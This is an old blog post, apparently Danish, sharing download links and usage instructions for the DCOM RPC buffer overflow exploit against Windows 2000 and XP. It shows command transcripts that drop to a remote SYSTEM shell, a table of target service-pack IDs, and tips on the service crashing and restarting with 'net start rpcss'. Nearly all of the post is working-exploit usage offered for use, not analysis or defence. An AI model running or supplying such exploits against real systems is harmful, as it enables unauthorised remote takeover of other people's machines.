Penetrating windows #2 (dcom rpc bof)

Files:
Source: http://base.fujang.dk/files/mike/dcom.c (include <error.h> removed)
Freebsd binary: http://base.fujang.dk/files/mike/dcom
Windows binary: http://base.fujang.dk/files/mike/dcom.exe + cygwin1.dll
The windows binary is compilled by padde (www.beastie.dk) modifications has
been made to make it compile under cygwin, the source file avail here was not
used to compile this binary.

Windows usage:

C:\>domc 0 192.168.10.123
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Using return address of 0x77e81674
- Dropping to System Shell...

Microsoft Windows 2000 [version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>whoami
whoami
NT AUTHORITY\SYSTEM

C:\WINNT\system32>

Unix usage:
bash$ ./dcom 0 192.168.10.123
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm [at] metasploit.com>
- Using return address of 0x77e81674
- Dropping to System Shell...

Microsoft Windows 2000 [version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>


The leading zero must be set to one of the following, and describe the target 
system.
-          0    Windows 2000 SP0 (english)
-          1    Windows 2000 SP1 (english)
-          2    Windows 2000 SP2 (english)
-          3    Windows 2000 SP3 (english)
-          4    Windows 2000 SP4 (english)
-          5    Windows XP SP0 (english)
-          6    Windows XP SP1 (english)

Thoug it says english, i have successfully tested this against several danish
versions as well.

You will most likeley have only one shot at this one because the vuln. service
will crash after one try. Also after successfully exploiting this you wont be 
able to exploit again because the services craches. For more information, read the source.

Looks as though the service continue running during the shell, to restart the shell type : net start rpcss , wont help you to start this from the shell, gotta be done afterwards.
Dette indlæg blev udgivet i Backdoors, Knowledge Base, Old Base, Windows. Bogmærk permalinket.

Skriv et svar